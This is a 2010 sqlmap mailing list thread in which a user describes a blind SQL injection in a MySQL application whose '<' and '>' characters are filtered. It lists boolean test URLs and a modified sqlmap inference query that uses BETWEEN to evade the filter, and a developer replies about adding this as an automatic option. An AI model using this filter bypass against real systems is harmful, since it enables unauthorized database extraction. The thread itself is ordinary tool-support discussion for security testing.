Re: [sqlmap-users] blind sql injection problem

SourceForge Headquarters 1320 Columbia Street Suite 310 San Diego, CA 92101 +1 (858) 422-6466

Hi.

We'll take into the consideration implementation of the program option which
could do this automatically - in case of inference tests usage of between
program structure instead of standard lesser/greater - or maybe use it as a
primary concept.

Kind regards.

On Tue, Feb 23, 2010 at 10:59 AM, velky brat <vel...@gm...> wrote:

> Ok, I have resolved the problem. Just brief info for other users:
> If characters like '<' or '>' are filtered, it is possible to modify query
> like this
>
>
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> vb
>
>
> On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:
>
>> Hello,
>> I have found blind SQL injection in the GET parameter of  audited MySQL
>> application (also sqlmap is able to identify the injection), but it is not
>> possible to dump any data (like --current-user or --current-db). Only
>> option, which is working is --fingerprint (gives correct result of mySQL 5
>> version), all other options gave the same result as "None".
>> Because it looked strange to me, I made some basic tests manually with
>> following results:
>>
>>
>> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
>> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
>> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be  FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>>
>> As you can see from these results, it looks that  characters "<" and ">"
>> are filtered within application.
>>
>> However, injection is still working. I suppose, that sqlmap uses these
>> characters ("<",">") really often during dumping of data from database.
>> So I have changed the following line in mysql section of queries.xml file:
>>
>> original line:
>> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>>
>> updated line:
>> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>>
>> Unfortunatelly, the result was same (None). What else should be modified?
>>
>> Is it be possible to use BETWEEN statement instead of ">" in current
>> version of sqlmap?
>> Is it already supported somehow in sqlmap or would it appear in future
>> versions?
>>
>> Thank you in advance
>>
>> vb
>>
>>
>
>
> ------------------------------------------------------------------------------
> Download Intel&#174; Parallel Studio Eval
> Try the new software tools for yourself. Speed compiling, find bugs
> proactively, and fine-tune applications for parallel performance.
> See why Intel Parallel Studio got high marks during beta.
> http://p.sf.net/sfu/intel-sw-dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B